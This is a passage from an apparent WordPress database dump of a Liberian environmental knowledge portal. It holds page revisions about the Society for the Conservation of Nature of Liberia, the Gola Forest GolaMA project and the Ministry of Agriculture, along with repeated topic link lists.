(NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:scnl\" page_length=\"false\"]','Society for the Conservation of Nature of Liberia','','inherit','closed','closed','','2769-revision-v1','','','2019-11-25 23:32:06','2019-11-25 23:32:06','',2769,'https://ekmsliberia.info/2769-revision-v1/',0,'revision','',0),(2773,1,'2019-11-25 23:34:58','2019-11-25 23:34:58','<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia’s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia’s natural resources to ensure a healthy environment and good quality life for all people in Liberia.</p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:scnl\" page_length=\"false\"]','Society for the Conservation of Nature of Liberia','','inherit','closed','closed','','2769-revision-v1','','','2019-11-25 23:34:58','2019-11-25 23:34:58','',2769,'https://ekmsliberia.info/2769-revision-v1/',0,'revision','',0),(2774,1,'2019-11-25 23:35:56','2019-11-25 23:35:56','The Society for the Conservation of Nature of Liberia (SCNL) is Liberia’s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia’s natural resources to ensure a healthy environment and good quality life for all people in Liberia.\r\n\r\nSCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:scnl\" page_length=\"false\"]','Society for the Conservation of Nature of Liberia','','inherit','closed','closed','','2769-revision-v1','','','2019-11-25 23:35:56','2019-11-25 23:35:56','',2769,'https://ekmsliberia.info/2769-revision-v1/',0,'revision','',0),(2775,1,'2019-11-25 23:46:35','2019-11-25 23:46:35','onnecting forest and people, the GolaMA Project is a partnership between forest communities, the Government of Liberia and the international conservation community to conserve and manage the Gola Forest that lies outside of protected areas. The project is implemented by SCNL in collaboration with the Royal Society for the Protection of Birds (RSPB).\r\n\r\nThe forest where the GolaMA Project is working covers about 40,000 ha of the Gola Forest and in effect forms a corridor linking two prospective protected areas in Liberia – the proposed Gola Forest National Park and the Foya Reserve – as well the Gola Rainforest National Park in Sierra Leone.\r\n\r\nThe GolaMA Project is a partnership between forest communities, the Government of Liberia and the international conservation community to conserve and manage the Gola Forest that lies outside of protected areas. The project is implemented by SCNL in collaboration with the Royal Society for the Protection of Birds (RSPB)','The GolaMA','The GolaMA Project is a partnership between forest communities, the Government of Liberia and the international conservation community to conserve and manage the Gola Forest that lies outside of protected areas.','publish','closed','closed','','the-golama','','','2019-11-25 23:46:35','2019-11-25 23:46:35','',0,'https://ekmsliberia.info/?post_type=project_resource&#038;p=2775',1,'project_resource','',0),(2776,1,'2019-11-25 23:45:06','2019-11-25 23:45:06','','featured_scnl_project','Photo Credit: SCNL','inherit','open','closed','','featured_scnl_project','','','2019-11-25 23:45:19','2019-11-25 23:45:19','',2775,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_scnl_project.jpg',0,'attachment','image/jpeg',0),(2777,1,'2019-11-25 23:46:35','2019-11-25 23:46:35','onnecting forest and people, the GolaMA Project is a partnership between forest communities, the Government of Liberia and the international conservation community to conserve and manage the Gola Forest that lies outside of protected areas. The project is implemented by SCNL in collaboration with the Royal Society for the Protection of Birds (RSPB).\r\n\r\nThe forest where the GolaMA Project is working covers about 40,000 ha of the Gola Forest and in effect forms a corridor linking two prospective protected areas in Liberia – the proposed Gola Forest National Park and the Foya Reserve – as well the Gola Rainforest National Park in Sierra Leone.\r\n\r\nThe GolaMA Project is a partnership between forest communities, the Government of Liberia and the international conservation community to conserve and manage the Gola Forest that lies outside of protected areas. The project is implemented by SCNL in collaboration with the Royal Society for the Protection of Birds (RSPB)','The GolaMA','The GolaMA Project is a partnership between forest communities, the Government of Liberia and the international conservation community to conserve and manage the Gola Forest that lies outside of protected areas.','inherit','closed','closed','','2775-revision-v1','','','2019-11-25 23:46:35','2019-11-25 23:46:35','',2775,'https://ekmsliberia.info/2775-revision-v1/',0,'revision','',0),(2778,1,'2019-11-25 23:48:54','2019-11-25 23:48:54','','SCNL Official Site','','publish','closed','closed','','scnl-official-site','','','2019-11-25 23:48:54','2019-11-25 23:48:54','',0,'https://ekmsliberia.info/?p=2778',1,'nav_menu_item','',0),(2779,1,'2019-11-25 23:51:56','2019-11-25 23:51:56','','SCNL Sidebar','','publish','closed','closed','','scnl-sidebar','','','2019-11-25 23:51:56','2019-11-25 23:51:56','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2779',0,'sidebar','',0),(2780,1,'2019-11-25 23:51:20','2019-11-25 23:51:20','','','','publish','closed','closed','','2780','','','2019-11-25 23:51:35','2019-11-25 23:51:35','',2779,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2780',1,'condition_group','',0),(2781,1,'2019-11-25 23:53:07','2019-11-25 23:53:07','','SCNL_Liberia_Logo-150x150','','inherit','open','closed','','scnl_liberia_logo-150x150','','','2021-08-17 22:10:55','2021-08-17 22:10:55','',2769,'https://ekmsliberia.info/wp-content/uploads/2019/11/SCNL_Liberia_Logo-150x150.png',0,'attachment','image/png',0),(2782,1,'2019-11-25 23:56:50','2019-11-25 23:56:50','','featured_moa','','inherit','open','closed','','featured_moa','','','2019-11-25 23:56:50','2019-11-25 23:56:50','',1600,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_moa.jpg',0,'attachment','image/jpeg',0),(2783,1,'2019-11-25 23:57:01','2019-11-25 23:57:01','The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.\r\n\r\nIn addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.\r\n\r\nThe core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.\r\n<h4>Mandate</h4>\r\nThe Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:moa\" page_length=\"false\"]','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2019-11-25 23:57:01','2019-11-25 23:57:01','',1600,'https://ekmsliberia.info/1600-revision-v1/',0,'revision','',0),(2784,1,'2019-11-26 00:02:03','2019-11-26 00:02:03','','featured_agriculture_biodiversity','','inherit','open','closed','','featured_agriculture_biodiversity','','','2019-11-26 00:02:03','2019-11-26 00:02:03','',471,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_agriculture_biodiversity.jpg',0,'attachment','image/jpeg',0),(2785,1,'2019-11-26 00:55:17','2019-11-26 00:55:17','<h2>Select a Topic</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land Degradation and Drought</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-26 00:55:17','2019-11-26 00:55:17','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2786,1,'2019-11-26 00:56:19','2019-11-26 00:56:19','<h2>Select a Topic</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land Degradation and Drought</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-26 00:56:19','2019-11-26 00:56:19','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2787,1,'2019-11-26 00:56:47','2019-11-26 00:56:47','<h2>Select a Topic</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land Degradation and Drought</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-26 00:56:47','2019-11-26 00:56:47','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2788,1,'2019-11-26 00:58:38','2019-11-26 00:58:38','<h2>Select a Topic</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land Degradation and Drought</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-26 00:58:38','2019-11-26 00:58:38','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2789,1,'2019-11-26 00:59:07','2019-11-26 00:59:07','<h2>Select a Topic</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land Degradation and Drought</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-26 00:59:07','2019-11-26 00:59:07','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2790,1,'2019-11-26 07:50:12','2019-11-26 07:50:12','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire 